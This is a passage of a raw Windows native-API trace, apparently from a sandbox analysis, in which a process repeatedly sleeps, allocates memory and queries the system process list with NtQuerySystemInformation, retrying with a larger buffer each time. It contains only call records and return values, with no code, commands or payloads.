NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.350] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.366] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.381] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.398] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.413] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.428] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.443] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.458] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.474] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.490] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.506] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.522] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.537] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.554] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.568] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.584] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.599] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.617] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.630] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.646] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0135.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0135.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0135.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0135.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0135.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0135.662] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0135.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 